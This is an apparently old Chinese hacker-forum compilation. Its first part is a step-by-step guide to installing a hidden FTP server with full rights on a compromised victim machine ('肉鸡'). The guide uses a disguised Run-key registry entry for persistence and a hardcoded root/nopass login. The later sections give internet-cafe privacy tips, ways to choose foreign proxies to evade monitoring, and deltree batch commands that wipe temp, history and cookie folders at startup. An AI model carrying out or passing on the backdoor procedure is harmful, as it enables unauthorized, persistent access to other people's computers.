本地设置：将本文附带的文件全部放在一个文件夹里面，这里是d:\ftp，然后运行adminftp.exe。运行窗口分成三部分，最上面是服务器的参数的设置，左下方是用户帐号的设置，右下方是访问目录的设置。

对于服务器参数的设置，只需要对server port（服务器端口）进行一下设置就可以了，因为服务器上通常还运行有ftp服务器，所以，我们改一个不一样的端口，这里我是设置了3323,另外两个参数就不用管了。然后，我们再添加一个用户，点一下new，输入一个用户名root，再选中这个用户，输入一个密码nopass 。最后，在localroot上输入一个路径c:\，这是作为root用户的根目录的，点一下new，在弹出的窗口上输入 / 就可以了，再将下面的四个权限全部钩上吧。read权限允许用户下载文件，write权限允许用户上传文件，list权限允许用户看目录列表，admin权限允许用户重命令和删除ftp服务器上的文件。如果需要，还可以创建多个用户，这就要看你了。

进入命令行，切换目录到d:\ftp，输入

reg export "HKLM\SOFTWARE\WhitSoft Development" ftp.reg

现在本地操作已经全部完成了。

远程操作：将ftp.reg、slimftp2.exe、reg.exe都上传到肉鸡上，然后将slimftp2.exe拷贝到肉鸡的系统目录（通常为c:\winnt\system32，假如不存在）上。再运行

reg import ftp.reg

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winsock2up /d slimftp2.exe

copy slimftp2.exe %systemroot%\system32

slimftp2.exe

运行copy slimftp2.exe %systemroot%\system32这步的时候有时会提示出错，这是因为slimftp2.exe已经是在系统目录上了。最后，删除ftp.reg吧！。

呵呵，一切都完成了，即使肉鸡重启我们的ftp服务器也会照样运行的。

不过，这个服务器的端口有点特别，我们怎么访问呢？

假如是用ie，这样输入就好了tp://root:nopass@192.168.0.1:3323/ 将192.168.0.1替换成你服务器的ip就可以了。dos下的ftp呢？这样！

ftp

open 192.168.0.1 3323

root

nopass

注意事项：你可以将slimftp2.exe的文件名、服务端口更改，但是，相应的步骤输入也应该更改。

比如，我将slimftp2.exe改名叫wsockup.exe，那么，

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winsock2up /d slimftp2.exe

就应该变为

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Winsock2up /d wsockup.exe


在网吧上网的一些安全问题

1。上网首先查看C盘是否共享，如把C盘设为共享，别人就可通过局域网访问到你的windows目录，也就是说可看见你的internet临时文件夹里的内容，从而获取你上网的一些信息。

方法。：双击＂我的电脑＂，右键单击C盘图标，选择＂属性＂，在＂共享＂标签下选＂不共享＂。

2。下网时，清除临时文件和历史记录。

选择IE上的＂工具＂（IE5）或＂查看＂（IE4），选择＂internet选项＂，在＂常规＂选项卡中点＂删除文件＂和＂清楚历史记录＂，将临时文件和历史记录删除；，在＂历史纪录＂中，＂网页保存在历史纪录中的天数＂选0天。在＂内容＂标签下点＂自动完成＂，在＂清除自动完成历史记录＂中点＂清除表单＂和＂清除密码＂；在＂常规＂选项卡中点＂设置＂，再选＂查看文件＂，把窗口中的cookie文件全部删除。要对付Cookie，可有三种办法：一是干脆禁止，这可以通过设置浏览器的安全程度来实现（见4）；二是定期删除之，这可以找一些软件来做，如：＂优化大师＂或＂超级兔子魔法设置＂等，或者干脆手工删去计算机中相应目录中（一般\windows\cookies目录中，也有些情况IE在＂Temporary Internet Files＂中，在Netscape中）的所有Cookie（见4）；三是可到网上下载一些专门管理，禁止Cookie的小软件。

此外，安全部门从理论上说可能会在你的计算机里植入＂特洛伊木马＂（实际上是一种病毒）（虽然这种机会不多），一旦他们成功，你的计算机就相当于完全透明！

3。除Cookie之外，网上有一些网页本身包含了一些不安全的ActiveX和Java等代码，当你访问这些网页时，网站管理者也可以获得有关你计算机的更多信息，由此不难确定你的身份。

方法：选择IE上的＂工具＂（IE5）或＂查看＂（IE4），选择＂internet选项＂，选＂safe＂（安全）项，点＂自定义级别＂，在＂对没有标记为安全的ActiveX控件进行初始化和脚本运行＂和＂下载未签名的ActiveX控件＂中选择＂禁用＂。

4。下网时，点开始->关闭系统->重新启动计算机并切换到ms-dos方式，在c：\windows下输入＂cd cookies＂，回车，输入＂del *.*＂，回车，输入＂y＂，再回车即可。也可上网前禁用cookie，选择IE上的＂工具＂（IE5）或＂查看＂（IE4），选择＂internet选项＂，选＂safe＂（安全）项，点＂自定义级别＂，在Cookies选项中，在＂允许使用存储在你计算机中的Cookies＂中，选中＂禁用＂；在＂允许使用每个对话Cookies（未存储）＂中，选＂提示＂，这主要是方便以后碰到来历不明的人使用对话Cookies时，可选＂否＂，以不让其使用。在＂客户验证＂中，＂登录＂选＂匿名登录＂。

选＂高级＂，在＂安全＂中，可将所有的选项打勾。

Netscape4.03，4.05中文版设置：

（1）选＂导航器＂功能表，选＂工具＂选项，点＂安全信息＂，点＂导航器＂，将所有的选项打勾。打开＂口令＂，点＂设置口令＂，设置自己的口令。可根据需要，设置证书等其他选项。

（2）选＂编辑＂功能表，选＂首选项＂，在左框中：点Advance（高级），在右边的选项方框中，打上所有的勾；在Cookie中，选＂禁用Cookie＂；点：＂漫游服务＂，选＂专案选择＂，取消＂Cookie＂，＂历史纪录＂的勾号。

5。有的人用oicq联系，为了安全和防止密码被盗，上oicq一定要从＂注册向导＂开始，不要直接点＂登陆＂，下oicq时，右键点oicq图标，选＂属性＂，弹出的对话框中＂目标＂栏的路径就是oicq所在目录，进入此目录，删除以你的号码命名的文件夹。

6。用outlook发信的下网时，在＂工具＂->＂帐号＂中把你的帐号删除。]

7。用A盘拷贝网上文章，会在开始->文档中留下你在A盘中打开的文件的题目，

方法：开始->设置->任务栏和开始菜单->点击＂开始菜单程序＂->点击＂清除＂->确定。

8。在家上网的，要经常更换代理服务器，国内假代理服务器多以202和61打头，注意区别。对于搜索到的免费代理服务器的具体地址，我们可用＂追捕Wry＂或＂Whois＂等软件进行检验，以确定其具体地址到底是在国内还是在国外。例如，我们先用代理猎手在地址段202.137.0.0──202.191.255.255进行搜索，得部分代理地址，然后再用＂追捕＂检验。这里提供一些国内的地址段：

202.118.208.0─ 202.127.204.255 国内
202.130.0.0─ 202.130.249.255 国内
202.136.254.0─ 202.136.255.255 国内
202.192.00.0─ 202.207.255.255 国内

等等。在设置代理猎手搜索时应在国外的地址段中选择。当然，上述地址段内有些小段可能还会有些出入。注意选用的代理服务器还必须是免费（free）且速度较快。

这里要特别注意名为＂亚洲＂的代理地址，如不能另行确定，还是不用为好，以免为国内地址。一般情况下，Proxy都可对外隐藏你的IP，但是如果有人刻意（如在论坛上）安装一个小程序，还是能取到你的上网ＩＰ，只有少数PROXY能将你的ＩＰ完全保密。故检验代理服务器的安全性非常重要。可到http：//cachenow.Virtualave.net/forum/index.html，用其中的代理服务器检测工具进行检测，如果所有的CGI环境变量都没有包括自己的IP地址，则该代理服务器就是安全的。

9。win+m组合键（win键在ctrl和alt之间）可最小化所有打开窗口，有危险时可用此组合键最小化所有窗口。

10。用二次代理Safeweb时，不要直接进入你要进的网站，先进入别的网站（如163），再在左上角的框中输入你要进的网址，这样网管只能看见你进入的是163网。

11。解压缩（Extract to）看的文章后，记住解压缩的路径，下网后记住删除。删除时同时按住Shift和Delete键可一次彻底删除。


自动清除文件的简易方法和补充

自动清除文件的简易方法和补充

我们可以采用一种简易方法来删除上网和编辑资料的踪迹，就是用dos的deltree命令。
把下面的一段命令加到windows的autoexec.bat文件的最后：

deltree /y c:\windows\temp\*.*
deltree /y c:\windows\Recent\*.*
deltree /y c:\windows\Tempor~1\*.*
deltree /y c:\windows\History\*.*
deltree /y c:\windows\Cookies\*.txt

这样每次开机启动windows时都会执行上面的命令来删除有关文件夹里的内容，我加了5个文件夹，windows\temp是临时文件夹，一般需要及时删除其内容；第二个windows\Recent是windows开始菜单的文档文件夹，我们编辑资料时，windows会把你编辑过的资料自动在这个文件夹下存一分，所以也需要删除；第三个是IE的Temporary Internet Files文件夹在dos下的映射名；第四个是IE的历史文件夹；最后一个是IE的Cookie文件夹。

另外，我的windows98的安装路径是c:\windows，实际使用时你需要将它替换成你的windows98的安装路径就可以了。当然，IE的历史记录和Cookie都可以在IE中设置禁止。我加的这5个文件夹是针对windows98和IE的，你也可以根据自己的需要加上其它需要删除的文件夹，用类似上面的格式：

deltree/y 文件夹绝对路径名\*.*

这样该文件夹下的所有内容包括子文件夹都将在windows启动时被删除，有一点需要非常注意，你一定不要把文件夹的名字或路径写错了，否则会被不加提示的删除掉，比如你写了deltree/y c:\windows\*.*则你的windows目录下的所有内容都将被删除，所以要特别小心别写错了。

另外你还可以把这一系列的deltree命令单独保存为一个.bat文件，比如我将上面的5个命令用文本编辑器存为一个文件autodel.bat，这样我可以在上完网或编辑完资料时，在资源管理器中双击该文件运行它就可以实现随时删除上网和编辑资料的踪迹，因为在windows启动时通过按下某个键可以跳过不执行autoexec.bat文件，所以最好在你做完事后及时删除踪迹。最好是两种方法都采用，autoexec.bat和autodel.bat双管齐下(autodelbat是我取的文件名，你也可以取其它的文件名，但扩展名必须是.bat)

另外介绍一种小技巧，公共环境中使用电脑的朋友，当你正在上网或编辑资料而需要临时离开一下时，但又不想让别人看到你正在干什么。你首先需要在“显示
属性”中加屏幕保护密码（方法：用鼠标右击桌面的空白处，在弹出菜单中选属性，然后在屏幕保护属性中进行设置），然后在windows的system文件夹中随便找一个扩展名为scr的屏幕保护文件，然后拖动到桌面建立快捷方式；这样当你需要临时离开电脑时，只需双击这个快捷方式运行屏幕保护使别人看不到你正在进行的工作，当你回来时输入屏幕保护密码就可以继续进行你的工作。

--------------------------------------------------------------------------------

对上文的“自动清除文件的简易方法”的补充

经过进一步的测试发现，deltree命令对IE的Temporary Internet Files和History文件夹删除不干净，现象是在windows环境下直接运行autodel.bat(autodel.bat是我取的文件名，你也可以取其它的文件名，但扩展名必须是.bat)时，这两个文件夹的内容看起来已经删除了，但实际并没有删除掉，你刚才删除的临时文件自己会回到Temporary Internet Files和History这两个文件夹，可能是系统在内存保存了一份。而在autoexec.bat文件中的deltree命令对存储在Temporary Internet Files中的cookie文件也无能为力。但deltree这个命令对windows\temp，windows\Recent，windows\Cookies这几个文件夹和其它普通文件夹还是很好用的。

所以最好还是在IE的设置中设置历史记录为0天（在桌面上用鼠标右击IE图标，点属性，在“常规”选项卡设置历史记录为0），禁止使用cookie（在桌面上用鼠标右击IE图标，点属性，在“安全”选项卡下的“自定义级别”中禁止cookie），并手工删除Temporary Internet Files的内容；或者干脆全部手工删除这些文件。

我的经验做法是：

一：IE的设置（我是IE5）

1.设置IE历史记录为0天；
2.禁止写cookie：在桌面上用鼠标右击IE（我是IE5)图标，点属性，在“安全”选项卡下的“自定义级别”中的cookie选项中，禁止“允许使用存储在您计算机上的cookie”，而“允许使用每个对话cookie”则可以启用；
3.同2在“安全”选项卡下的“自定义级别”中的最下方，选“匿名登录”；
4.在“内容”选项卡下的“自动完成”弹出对话框中，三个选项都不选。
5.在“高级”选项卡下将“安全”项的所有内容全部选中。

二、手工删除步骤

1.如果你编辑了有关文件：(1)点“开始”菜单，然后在“/设置/任务栏和开始菜单/开始菜单程序/”中点"清除"，即可清除编辑文档记录，就是在windows路径下的recent路径下的内容，同时IE的地址输入框下的网址列表也将被清除；(2)手工删除windows下的temp文件夹的内容。

2.如果你上了网：在资源管理器中打开windows文件夹，删除子文件夹History和Temporary Internet Files中的临时文件内容。因为前面设置了,"禁止写cookie"，所以cookie文件夹下应当没有内容，你可以不用管。如果你更改了设置，则也需要手工删除这个文件夹的内容。虽然设置了IE历史记录为0天，但我发现上完网后当天的网址列表还是会保存在History下的“今天”列表中，所以最好也手工删除之。

你也可以用令一种方法删除History和Temporary InternetFiles中的临时文件内容，首先用鼠标单击IE菜单栏中的"工具"菜单项，并从下拉菜单中选择"Internet选项"（或在桌面上右击IE图标，点属性）；接着在选项设置框中选中"常规"标签，并单击标签中的"删除文件"按钮来删除浏览器中的临时文件夹中的内容；然后在同样的对话框中单击"清除历史记录"按钮来删除浏览器中的历史记录和缓存中的内容。

最后还有一点非常重要，如果你的windows98处于多用户模式，如果你的98有一个以上不同的用户名登录过，可能在windows下会有一个Profiles文件夹，下面可能会有一个子文件夹以你的用户名命名，下面会存储你的上网Ccokie、History等记录，解决的方法是，将windows98设为单用户模式(运行regedit.exe，在注册表中HKEY_LOCAL_MACHINE\Network\Logon下，删除“UserProfiles”这一项。重起windows98后将Profiles文件夹删除即可。

最好再介绍一个手工删除文件的小技巧，一般删除的文件实际上windows把它放到了回收站，你还需要再清空回收站才能彻底删除，其实当你要删除文件时，只需按住“Shift”键，再点删除或按“Delete”键，windows会提示你是否彻底删除文件，你只需回答“是”确认删除。